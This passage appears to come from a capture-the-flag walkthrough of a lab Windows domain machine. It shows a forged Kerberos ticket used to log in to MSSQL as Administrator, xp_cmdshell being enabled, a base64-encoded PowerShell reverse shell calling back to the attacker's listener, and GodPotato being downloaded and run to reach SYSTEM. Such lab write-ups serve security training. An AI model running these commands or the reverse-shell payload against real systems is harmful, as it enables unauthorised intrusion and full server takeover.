[*] Customizing ticket for breach.vl/Christine.Bruce
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Christine.Bruce.ccache

and now we get the mssql shell as Administrator

└─$ export KRB5CCNAME=Christine.Bruce.ccache
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/breach]
└─$ impacket-mssqlclient Christine.Bruce@BREACHDC.breach.vl -k -no-pass                                                                                                               
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (BREACH\\Administrator  dbo@master)> 

and we are the sa

SQL (BREACH\\Administrator  dbo@master)> enum_logins
name                                 type_desc       is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin   
----------------------------------   -------------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------   
sa                                   SQL_LOGIN                 1          1               0             0            0              0           0           0           0   

##MS_PolicyEventProcessingLogin##    SQL_LOGIN                 1          0               0             0            0              0           0           0           0   

##MS_PolicyTsqlExecutionLogin##      SQL_LOGIN                 1          0               0             0            0              0           0           0           0   

BREACH\\Administrator                 WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0   

NT SERVICE\\SQLWriter                 WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0   

NT SERVICE\\Winmgmt                   WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0   

NT Service\\MSSQL$SQLEXPRESS          WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0   

BUILTIN\\Users                        WINDOWS_GROUP             0          0               0             0            0              0           0           0           0   

NT AUTHORITY\\SYSTEM                  WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0   

NT SERVICE\\SQLTELEMETRY$SQLEXPRESS   WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0   

let’s enable the xp_cmdshell

SQL (BREACH\\Administrator  dbo@master)> enable_xp_cmdshell
INFO(BREACHDC\\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(BREACHDC\\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\\Administrator  dbo@master)> xp_cmdshell whoami
output             
----------------   
breach\\svc_mssql   

NULL               

and we get the shell

SQL (BREACH\\Administrator  dbo@master)> xp_cmdshell "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAwADUAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

#on listener
└─$ nc -nlvp 9001                 
listening on [any] 9001 ...
connect to [10.10.14.105] from (UNKNOWN) [10.129.90.22] 51136

PS C:\\Windows\\system32> 

SeImpersonatePrivilege

We can see that SeImpersonatePrivilege is enabled

PS C:\\Windows\\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\\Windows\\system32> 

and we are nt authority\\system

PS C:\\temp> iwr <http://10.10.14.105/GodPotato-NET4.exe> -O GodPotato-NET4.exe
PS C:\\temp> .\\GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140734504960000
[*] DispatchTable: 0x140734507550584
[*] UseProtseqFunction: 0x140734506842928
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\\\.\\pipe\\dc465baf-12e3-4fce-9b8f-a0ebfae602b7\\pipe\\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00007c02-1784-ffff-eb44-eb369d31bf96
[*] DCOM obj OXID: 0x5733b412aa7e5133
[*] DCOM obj OID: 0x6ddff73a27048f84
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 920 Token:0x752  User: NT AUTHORITY\\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\\SYSTEM
[*] process start with pid 1400
nt authority\\system
PS C:\\temp> 

and we got the root.txt

PS C:\\temp> .\\GodPotato-NET4.exe -cmd "cmd /c dir C:\\Users\\Administrator\\Desktop"
[*] CombaseModule: 0x140734504960000
[*] DispatchTable: 0x140734507550584
[*] UseProtseqFunction: 0x140734506842928
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\\\.\\pipe\\a1fb5322-5066-443c-b21a-f8526aef9106\\pipe\\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000dc02-1a08-ffff-64c7-66e5646c9ba2
[*] DCOM obj OXID: 0xbceb56a3ea089caa
[*] DCOM obj OID: 0xc6afe3474fc7800f
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 920 Token:0x752  User: NT AUTHORITY\\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\\SYSTEM
[*] process start with pid 3172
 Volume in drive C has no label.
 Volume Serial Number is B465-02B6

 Directory of C:\\Users\\Administrator\\Desktop

02/17/2022  10:51 AM    <DIR>          .
09/08/2025  10:08 AM    <DIR>          ..
04/17/2025  12:37 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   6,213,795,840 bytes free
PS C:\\temp>